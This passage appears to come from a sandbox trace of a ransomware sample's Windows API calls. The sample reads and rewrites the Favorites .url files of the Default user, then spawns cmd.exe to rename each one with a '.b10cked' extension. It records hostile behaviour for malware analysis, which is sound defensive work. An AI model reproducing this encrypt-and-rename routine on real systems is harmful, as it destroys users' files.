(in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.614] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.614] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.615] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.615] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, 
nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.615] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.615] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.615] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.616] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Money.url", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0214.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Money.url", cchWideChar=13, lpMultiByteStr=0x13131ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN Money.url", lpUsedDefaultChar=0x0) returned 13 [0214.681] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0214.681] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0214.681] CloseHandle (hObject=0x120) returned 1 [0214.682] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL") returned 0x2f [0214.682] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\") returned 0x23 [0214.683] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x638, dwThreadId=0xb98)) returned 1 [0214.687] CloseHandle (hObject=0x1b4) returned 1 [0214.687] CloseHandle (hObject=0x120) returned 1 [0214.687] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.687] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.688] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount1=40, 
lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount2=40) returned 2 [0214.688] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.688] ReleaseMutex (hMutex=0xf8) returned 1 [0214.688] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.688] ReleaseMutex (hMutex=0xf8) returned 1 [0214.688] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.688] ReleaseMutex (hMutex=0xf8) returned 1 [0214.688] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.688] ReleaseMutex (hMutex=0xf8) returned 1 [0214.688] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.688] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27147739817) returned 1 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.689] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.689] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0214.690] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.690] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0214.690] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.690] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0214.690] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.690] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.690] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.691] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.691] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, 
lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.691] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.691] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.691] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.691] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Sports.url", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0214.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Sports.url", cchWideChar=14, lpMultiByteStr=0x131324c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN Sports.url", lpUsedDefaultChar=0x0) returned 14 [0214.695] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0214.695] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0214.695] CloseHandle (hObject=0x120) returned 1 [0214.696] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL") returned 0x2f [0214.697] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\") returned 0x23 [0214.697] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xb64, dwThreadId=0xc94)) returned 1 [0214.699] CloseHandle (hObject=0x1b4) returned 1 [0214.699] CloseHandle (hObject=0x120) returned 1 [0214.699] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.699] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.699] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", 
cchCount1=40, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount2=40) returned 2 [0214.699] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.699] ReleaseMutex (hMutex=0xf8) returned 1 [0214.699] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.700] ReleaseMutex (hMutex=0xf8) returned 1 [0214.700] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.700] ReleaseMutex (hMutex=0xf8) returned 1 [0214.700] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.700] ReleaseMutex (hMutex=0xf8) returned 1 [0214.700] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.700] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27148932117) returned 1 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.701] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.701] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0214.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0214.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0214.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 